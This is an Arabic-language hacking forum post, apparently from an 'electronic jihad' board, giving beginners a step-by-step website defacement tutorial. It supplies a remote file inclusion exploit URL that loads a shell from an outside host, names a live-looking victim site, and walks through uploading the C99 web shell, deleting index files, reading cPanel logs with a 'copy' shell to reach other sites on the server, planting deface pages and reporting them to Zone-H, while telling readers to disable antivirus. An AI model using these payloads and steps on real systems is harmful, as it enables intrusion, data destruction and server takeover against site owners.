Members Login
Username 
 
Password 
    Remember Me  
Post Info TOPIC: كيف تخترق عن طريق الشل بالصور


سريه سفيان بن عوف الغامدي للجهاد الكتروني

Status: Offline
Posts: 632
Date:
كيف تخترق عن طريق الشل بالصور
Permalink   
 


بسم الله الحمن الرحيم

أسف على انقطاعي عن المنتدى لأسباب الانشغال
والان انا اعود اليكم بشرح للمبتدئيين في الهكر ليستفيدو منه
وسأقوم بتعليمكم من رفع الشيل على الموقع عن طرق ثغرات الفايل انكلوود الى اختراق السيرفر عن طريق شيل الكوبي
ويجب عليكم الانتباه جيدا

====== ما هو الشيل ؟؟ ======
الشيل هو سكريبت تقوم برفعه على الموقع لتقوم بالسيطرة على الموقع والسيرفر كامل
وهناك أنواع واصدارات منه ولكن الشيل الاهم هو شيل C99 وسترونه في المرفقات وتستطيع من خلاله رفع ملفاتك واعطاء التصاريح للملفات
واما شيل ()copy شيل الكوبي يستخدم لتخطي الحماية او ( السيف مود )
الان عرفتم مقدمة عن الشيلات ,,

====== كيف نرفع الشيلات على المواقع ======
أسهل طريقة في الهكر هي رفع الشيلات وهنالك عدة طرق
1- عن طريق مراكز التحميل بتحويل امتداد الشيل الى c99.php.jpg ,
2- عن طريق ثغرات الفايل انكلود File include

======= اختراق المواقع عن طريق الشيل =======
بسم الله الرحمن الرحيم
أخواني الان أبدا في شرح اختراق المواقع بعد ما عرفتم الشيل وفوائده وانواعه
الان سنطبق الدرس عن طريق ثغرة الفافيل انكلود ( File include )
وسنجرب ثغرة :
ادخل الى القوقل أو الياهو واكتب في البحث : *****Chat 4.5.7
الان يطلع لك مواقع كثيييييير
أختار واحد منهم
(( تابع الصورهـ ))



حلووو الان نكتب بعد رابط الموقع
[ استغلال الثغرة ]هذا الكود تحطه بعد الرابط :



كود:/inc/cmses/aedating4CMS.php?dir[inc]=http://www.hack15.com/evil/c.txt

يعني بيصير كذا شكله :



كود:http://furkids.net/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.hack15.com/evil/c.txt?cmd


ويستعرض لنا الشيل
تابعو الصورهـ :



الان اضغط على /public_html/للرجوع الى الصفحة الرئيسية الخاصة بالموقع
تابع الصورهـ :



فتح لنا جميع ملفات الموقع
نبحث عن ملف فيه تصريح 777 يكون لونه أخضر
شوفو الصورهـ ..



الان وبعد ان فتح لك المجلد
تستعرض جميع الملفات الموجوده داخله
واذا تبي تمسحها خذ راحتك << بس لا تأذي الناس خخخخخـ
المهم انك تمسح الملفات التاليه :
1- index.php
2- index.htm
ولا تقول لي ما لقيته
اذا ما لقيته عادي قد ما تلقاه في مجلدات الصور
المهم ,,
نمسح الملفات المطلوبه
<< بس انا مسحتها كلها عشان نخفف الصفحه وما يصير الشيل ثقيل
الان تضع العلامات ثم تختار Delete
وتضغط على زر Confirm
سيقوم بمسح الملفات المحدده
تابع الصورهـ ..



الان وبعد هذه الخطوه تقوم برفع ملف شيل
وهو الشيل : c99
<< وضعته لكم في المرفقات (( ملاحظة : أغلق برامج الحمايه حتى لا تحذف الشيل ))
اختار الشيل ثم اضغط على زر Upload
ولاحظ وجود كلمه " Ok " باللون الاخضر
وهذا لان الملف مصرح
تابع الصورهـ ..



بعد أن رفعت الشيل تذكر انك رفعته في ملف cache
اذاً :
اكتب بعد رابط الموقع الملف
رابط الموقع هو http://furkids.net/
فأكتب بعده
http://furkids.net/cache/c99.php
(( ملاحظه : c99.php << هذا الشيل اللي رفعناه ))
تابع الصورهـ ..



الان نفذ نفس الخطوات السابقة بس بدل ما ترفع الشيل
أرفع ملف الـ index تبعك وهو صفحه الاختراق
وبعد رفعه أرفع الشيل الثاني اللي بعطيك هو الان
<< شيل الـ ()copy أرفعه وافتح صفحه جديده في المتصفح
واكتب :
http://furkids.net/cache/copy.php
(( ملاحظه : copy.php << هذا ملف الشيل الثاني لاختراق السيرفر ))وتابع الصورهـ ..



الان وبعد وضع الموجود في المربع الاحمر بعد رابط الموقع
بيصير كذا :



كود:http://furkids.net/cache/copy.php?file=/var/cpanel/accounting.log

الان اذا طلع لك المواقع على السيرفر
فأقول لك
" الف مبروك .. السيرفر من حقك " الان شوفو كيف المواقع وانسخ اليوزر تبع الموقع المراد اختراقه
تابع الصورهـ ..



اليوزر هو الموجود في المربع
ننسخ واحد من اليوزرات
ونرجع للشيل القديم (( شيل c99 ))
ونضغط على كلمه /public_html/
يرجعك لصفحه البدايه
لاحظ فوق في الرابط اليوزر تبع الموقع اللي قاعد تخترقه
غيره ولصق اليوزر الجديد
(( ملاحظه : لا تمسح الرمز هذا " %2F "
تابع الصورهـ ..



الان يستعرض لك ملفات الموقع
اختار الملف المصرح بتصريح 777 والملون باللون الاخضر
وارفع في داخله ملف الـ index
وهي صفحه الاختراق
تابع الصورهـ ..



والان ارجع للشيل الكوبي
وشوف اليوزر اللي أستخدمته ورابط الموقع يساره
حط رابط الموقع وبعده الملف اللي رفعت عليه الصفحه
مثل : www.xxxxxxx.com/cccc/
(( ملاحظه : cccc << هذا الملف اللي رفعت عليه الصفحه ))
والان تابع الطريقه على كامل السيرفر
وسجل اختراقاتك في الـ Zone - H
واختراقا موفقا
ولا تعتدو على العرب

تحياتي لكمـ ,,,

مرفقات الموضوع :
شيل الـ c99 اضغط هنــآ
شيل الــ ()copy اضغط هنــــآ



__________________
Page 1 of 1  sorted by
 Add/remove tags to this thread
Quick Reply

Please log in to post quick replies.

Tweet this page Post to Digg Post to Del.icio.us


Create your own FREE Forum
Report Abuse
Powered by ActiveBoard